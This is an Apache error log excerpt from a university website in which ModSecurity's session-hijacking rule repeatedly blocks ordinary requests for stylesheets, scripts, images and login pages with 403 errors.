[Mon Aug 28 08:44:24.003938 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv7@MCo-f0AAJZmptsAAAAA"]
[Mon Aug 28 08:44:24.007319 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv7@MCo-f0AAJSr30gAAAAO"]
[Mon Aug 28 08:44:24.024042 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv7@MCo-f0AAJbxo7AAAAAJ"]
[Mon Aug 28 08:44:24.026741 2023] [:error] [pid 38644] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv7@MCo-f0AAJb0F8kAAAAK"]
[Mon Aug 28 08:44:24.039998 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv7@MCo-f0AAJbzcAUAAAAD"]
[Mon Aug 28 08:44:24.123938 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv7@MCo-f0AAJbPENcAAAAC"]
[Mon Aug 28 08:44:24.127026 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv7@MCo-f0AAJWfaCwAAAAI"]
[Mon Aug 28 08:44:24.133247 2023] [:error] [pid 38539] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOv7@MCo-f0AAJaL2TgAAAAG"]
[Mon Aug 28 08:44:24.142785 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOv7@MCo-f0AAJZmptwAAAAA"]
[Mon Aug 28 08:44:24.150753 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOv7@MCo-f0AAJXyOkAAAAAM"]
[Mon Aug 28 08:44:24.259486 2023] [:error] [pid 38644] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOv7@MCo-f0AAJb0F8oAAAAK"]
[Mon Aug 28 08:44:24.367846 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOv7@MCo-f0AAJbPENgAAAAC"]
[Mon Aug 28 08:44:24.623529 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOv7@MCo-f0AAJbxo7EAAAAJ"]
[Mon Aug 28 08:44:24.835129 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOv7@MCo-f0AAJSr30kAAAAO"]
[Mon Aug 28 08:44:24.952870 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOv7@MCo-f0AAJbzcAYAAAAD"]
[Mon Aug 28 08:44:25.117653 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOv7@cCo-f0AAJXyOkEAAAAM"]
[Mon Aug 28 08:44:25.243207 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOv7@cCo-f0AAJZmpt0AAAAA"]
[Mon Aug 28 08:44:40.539623 2023] [:error] [pid 38607] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb"] [unique_id "ZOv8CMCo-f0AAJbPENkAAAAC"]
[Mon Aug 28 08:45:00.107307 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv8HMCo-f0AAJTioe4AAAAE"]
[Mon Aug 28 08:45:26.848803 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv8NsCo-f0AAJb3RUgAAAAH"]
[Mon Aug 28 08:45:30.073101 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/pendaftaran/"] [unique_id "ZOv8OsCo-f0AAJSr31gAAAAO"]
[Mon Aug 28 08:45:30.297549 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8OsCo-f0AAJbzcAgAAAAD"]
[Mon Aug 28 08:45:36.175533 2023] [:error] [pid 38386] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb"] [unique_id "ZOv8QMCo-f0AAJXyOlEAAAAM"]
[Mon Aug 28 08:45:37.240146 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/pendaftar"] [unique_id "ZOv8QcCo-f0AAJbPEOIAAAAC"]
[Mon Aug 28 08:45:39.476243 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/pendaftar"] [unique_id "ZOv8Q8Co-f0AAJbzcAkAAAAD"]
[Mon Aug 28 08:45:41.475170 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb"] [unique_id "ZOv8RcCo-f0AAJWfaDgAAAAI"]
[Mon Aug 28 08:45:42.526228 2023] [:error] [pid 38646] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb/"] [unique_id "ZOv8RsCo-f0AAJb20-kAAAAB"]
[Mon Aug 28 08:45:45.863460 2023] [:error] [pid 38607] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv8ScCo-f0AAJbPEOMAAAAC"]
[Mon Aug 28 08:45:53.987777 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb/"] [unique_id "ZOv8UcCo-f0AAJWfaDkAAAAI"]
[Mon Aug 28 08:46:03.257015 2023] [:error] [pid 38646] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv8W8Co-f0AAJb20-oAAAAB"]
[Mon Aug 28 08:46:04.507570 2023] [:error] [pid 38648] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv8XMCo-f0AAJb4sRgAAAAL"]
[Mon Aug 28 08:46:04.507939 2023] [:error] [pid 38059] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv8XMCo-f0AAJSr31kAAAAO"]
[Mon Aug 28 08:46:04.523699 2023] [:error] [pid 38607] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv8XMCo-f0AAJbPEOUAAAAC"]
[Mon Aug 28 08:46:04.549458 2023] [:error] [pid 38502] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv8XMCo-f0AAJZmpuEAAAAA"]
[Mon Aug 28 08:46:04.549621 2023] [:error] [pid 38607] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv8XMCo-f0AAJbPEOYAAAAC"]
[Mon Aug 28 08:46:04.738796 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv8XMCo-f0AAJbxo84AAAAJ"]
[Mon Aug 28 08:46:05.267149 2023] [:error] [pid 38607] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8XcCo-f0AAJbPEOcAAAAC"]
[Mon Aug 28 08:46:05.718579 2023] [:error] [pid 38647] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv8XcCo-f0AAJb3RUkAAAAH"]
[Mon Aug 28 08:46:10.605340 2023] [:error] [pid 38386] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv8YsCo-f0AAJXyOlMAAAAM"]
[Mon Aug 28 08:46:11.846522 2023] [:error] [pid 38114] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8Y8Co-f0AAJTiof0AAAAE"]
[Mon Aug 28 08:46:13.976907 2023] [:error] [pid 38303] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv8ZcCo-f0AAJWfaEIAAAAI"]
[Mon Aug 28 08:46:14.288336 2023] [:error] [pid 38641] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8ZsCo-f0AAJbxo9AAAAAJ"]
[Mon Aug 28 08:46:21.291257 2023] [:error] [pid 38303] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv8bcCo-f0AAJWfaEMAAAAI"]
[Mon Aug 28 08:46:21.622296 2023] [:error] [pid 38683] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8bcCo-f0AAJcb464AAAAP"]
[Mon Aug 28 08:47:18.905648 2023] [:error] [pid 38685] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv8psCo-f0AAJcdfHoAAAAR"]
[Mon Aug 28 08:47:19.329402 2023] [:error] [pid 38647] [client 36.72.192.185] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv8p8Co-f0AAJb3RVoAAAAH"]
[Mon Aug 28 08:47:19.346491 2023] [:error] [pid 38643] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv8p8Co-f0AAJbzcBoAAAAD"]
[Mon Aug 28 08:47:19.367619 2023] [:error] [pid 38686] [client 36.72.192.185] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv8p8Co-f0AAJceGIYAAAAA"]
[Mon Aug 28 08:47:19.368461 2023] [:error] [pid 38114] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv8p8Co-f0AAJTiogUAAAAE"]
[Mon Aug 28 08:47:19.812929 2023] [:error] [pid 38641] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv8p8Co-f0AAJbxo9YAAAAJ"]
[Mon Aug 28 08:47:20.042803 2023] [:error] [pid 38648] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv8qMCo-f0AAJb4sSEAAAAL"]
[Mon Aug 28 08:47:20.172612 2023] [:error] [pid 38303] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8qMCo-f0AAJWfaEsAAAAI"]
[Mon Aug 28 08:47:21.055527 2023] [:error] [pid 38648] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv8qcCo-f0AAJb4sSIAAAAL"]
[Mon Aug 28 08:47:21.134923 2023] [:error] [pid 38686] [client 180.244.133.149] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv8qcCo-f0AAJceGIcAAAAA"]
[Mon Aug 28 08:47:21.134973 2023] [:error] [pid 38647] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv8qcCo-f0AAJb3RVsAAAAH"]
[Mon Aug 28 08:47:21.135901 2023] [:error] [pid 38685] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv8qcCo-f0AAJcdfHsAAAAR"]
[Mon Aug 28 08:47:21.140686 2023] [:error] [pid 38646] [client 36.72.192.185] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv8qcCo-f0AAJb21AcAAAAB"]
[Mon Aug 28 08:47:21.146092 2023] [:error] [pid 38643] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv8qcCo-f0AAJbzcBwAAAAD"]
[Mon Aug 28 08:47:21.337404 2023] [:error] [pid 38686] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv8qcCo-f0AAJceGIgAAAAA"]
[Mon Aug 28 08:47:21.429541 2023] [:error] [pid 38647] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv8qcCo-f0AAJb3RVwAAAAH"]
[Mon Aug 28 08:47:21.488006 2023] [:error] [pid 38646] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv8qcCo-f0AAJb21AgAAAAB"]
[Mon Aug 28 08:47:21.488207 2023] [:error] [pid 38114] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv8qcCo-f0AAJTiogYAAAAE"]
[Mon Aug 28 08:47:21.490740 2023] [:error] [pid 38686] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv8qcCo-f0AAJceGIkAAAAA"]
